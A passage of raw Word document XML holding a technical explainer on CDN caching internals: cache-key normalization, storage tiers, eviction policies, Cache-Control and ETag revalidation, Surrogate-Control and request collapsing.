          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sort query parameters alphabetically:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> page=1&amp;q=coffee&amp;sort=price for all three.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDB86F0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remove tracking parameters:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Strip utm_*, fbclid, gclid before computing the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD48DC9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Canonical URL → single cache entry → better hit rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315047BD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Storage Tiers — The Internal Memory Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDCF0E7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tier 1 — Hot RAM Cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A12C68E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The smallest, fastest cache tier. Stores the most frequently accessed content — the top 0.1% of content by request frequency that accounts for ~40% of all requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57FA26" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Implementation: </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LRU (Least Recently Used) hash map</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> in process memory. O(1) lookups. Access time: ~100 nanoseconds. Cache size: configured to leave headroom for OS and process overhead (typically 50–70% of available RAM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03243F01" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Promotion policy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Items are promoted from disk to RAM cache when their access frequency exceeds a threshold. A newly cached item starts in disk cache and is promoted to RAM after N accesses within a time window — preventing single-access items from evicting hot content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2091A983" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tier 2 — Warm SSD Cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F20B726" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Larger, slower. Stores the broader working set — content accessed frequently but not frequently enough for RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EEBE4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Implementation: On-disk hash map with SSD-optimized data structures. Content is divided into fixed-size chunks (typically 1MB or 4MB blocks). A metadata index (stored in RAM) maps cache keys to their on-disk locations. Content retrieval: RAM index lookup (~100ns) + SSD read (~100µs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4C87C8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write policy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> New content is written to SSD immediately after the first cache miss (while simultaneously served to the client). Subsequent requests serve from SSD. After sufficient access frequency, content is promoted to RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1901EA89" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tier 3 — Cold HDD Cache (less common in modern deployments):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F4C4D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Some older CDN nodes use spinning disks for a third cache tier. Access times of 5–10ms make this tier unsuitable for latency-sensitive requests. Modern deployments increasingly use NVMe SSD exclusively, accepting the higher cost for dramatically better latency characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096F3191" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache eviction policies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD4A71" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LRU (Least Recently Used):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Standard for RAM caches. Implemented as a doubly-linked list + hash map. O(1) access, O(1) promotion to front, O(1) eviction from tail. Weakness: a sequential scan of unique items (a web crawler accessing every page once) evicts the entire hot cache. Scan-resistant LRU variants (S-LRU, CLOCK-Pro) mitigate this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD7E76" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>FIFO (First In, First Out):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Simple for disk caches. Each new item appends to the end of a queue; the front is evicted when space is needed. Very low CPU overhead. Weakness: doesn't consider access frequency — a frequently accessed item that entered the cache early is evicted while a recently added item that will never be accessed again stays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D92B30" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LIRS (Low Inter-reference Recency Set):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve"> Divides cache into a protected set (frequently accessed items, resistant to eviction) and a probationary set (recently accessed but </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>unproven items). Items are promoted from probationary to protected after their second access. Significantly better scan resistance than LRU with similar overhead. Used by Varnish and some CDN implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135AC4BB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>TinyLFU (Tiny Least Frequently Used):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Uses a frequency sketch (Count-Min Sketch — a probabilistic data structure) to estimate access frequency with minimal memory overhead. Candidates for admission are compared to the eviction candidate — only admitted if their estimated frequency is higher. Dramatically reduces cache pollution from one-hit wonders. Used by Caffeine (Java), adapted by some CDN implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C39E9D1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Freshness — TTL Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CBAD05" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Cache-Control header hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B99E90" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004DCFF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: max-age=3600, stale-while-revalidate=600, stale-if-error=86400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759EDE94" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>max-age=3600:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> The response is fresh for 3600 seconds (1 hour). CDN serves from cache without contacting origin during this window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACDB997" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>stale-while-revalidate=600:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> After max-age expires, the CDN may serve the stale response for up to 600 additional seconds while </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>asynchronously</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> fetching a fresh copy from origin. The user gets an instant response (zero additional latency). The background revalidation updates the cache without blocking any request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7155D05C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>stale-if-error=86400:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> If origin returns an error (5xx, timeout, connection refused), serve the stale cached response for up to 86400 seconds (24 hours). This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>resilience fallback</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — the CDN becomes a buffer protecting users from origin outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04275907" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The combined staleness model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748F21E7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32149C3F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 0: Response cached, max-age=3600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBAE424" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 3600: Response becomes stale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCF2F51" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 3600-4200: stale-while-revalidate window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46570207" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → Serve stale immediately, revalidate in background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F5AAF3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → Any request in this window triggers ONE background revalidation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ABEF09" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → Subsequent requests during revalidation also get stale (already serving fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFE2667" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 4200: stale-while-revalidate expires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34141A41" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  → Must wait for revalidation before serving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02400B7B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → If origin errors: stale-if-error kicks in for 86400s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E051551" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 90000: stale-if-error expires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540FC800" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  → Must return error if origin still failing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C78976A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conditional revalidation — reducing origin load:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955C188" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>When a cached response expires, instead of fetching the full response, the CDN sends a </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>conditional request</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE5A58" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380CB6F0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>GET /image.jpg HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD2EE47" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>If-None-Match: "etag-abc123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690BF282" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>If-Modified-Since: Mon, 15 Jan 2024 10:30:00 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A634178" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD33CB6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>304 Not Modified (no body, just headers): content hasn't changed. CDN refreshes the TTL and serves the existing cached content. Zero bandwidth consumed for the response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCDAB8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>200 OK with new body: content changed. CDN stores the new response and serves it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EFC56C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>For large static assets (images, videos, JS bundles) that rarely change, 304 responses are the norm — bandwidth savings are enormous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60758E62" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ETag mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E430C0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>An ETag is an opaque validator — typically a hash of the response body or a version identifier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052F05DA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78003656" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>ETag: "sha256-a3f4b2c1d0e9f8g7"  (strong ETag — byte-for-byte identical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B317FA6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>ETag: W/"version-1234"           (weak ETag — semantically equivalent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FAC743" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Strong ETags are required for range request validation. Weak ETags allow semantic equivalence without byte-level identity (e.g., a gzipped and uncompressed version of the same content have different bytes but the same semantic content).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BB4BE0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CDN-specific TTL overrides:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535AB800" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDNs allow operators to override origin-specified TTLs at the CDN configuration level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A51B9DB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C53E8F1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Rule: paths matching /static/* → cache for 1 year regardless of origin Cache-Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C2BFD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Rule: paths matching /api/* → cache for 60 seconds maximum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D0327E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Rule: paths matching /user/* → never cache (private content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E04B5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>This allows CDN configuration to enforce caching policies even if the origin application code doesn't correctly set Cache-Control headers — or to enforce stricter limits than the origin specifies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33777430" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Surrogate-Control vs Cache-Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B12683" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Varnish and some CDNs support a Surrogate-Control header specifically for CDN consumption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1F3799" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA4B16A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Surrogate-Control: max-age=86400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3836F844" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: max-age=0, no-store  (tell browsers not to cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF0A7E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CDN reads Surrogate-Control for its own TTL while passing Cache-Control to browsers. This decouples CDN caching policy from browser caching policy — content can be aggressively cached at the CDN while browsers always fetch fresh from the CDN. The CDN strips Surrogate-Control before forwarding to clients so it's not exposed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA249AF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request Collapsing — The Thundering Herd Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1841B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>When a cache entry expires and thousands of concurrent users request the same content simultaneously, every request misses the cache and hits origin — the </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>thundering herd</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cache stampede</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7265EF39" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request collapsing (also called request coalescing or request queuing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9761BB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CDN edge node detects that multiple requests are for the same cache-key and the cache is being revalidated. Instead of forwarding all requests to origin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D1EE0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>
        </w:numPr>
      </w:pPr>
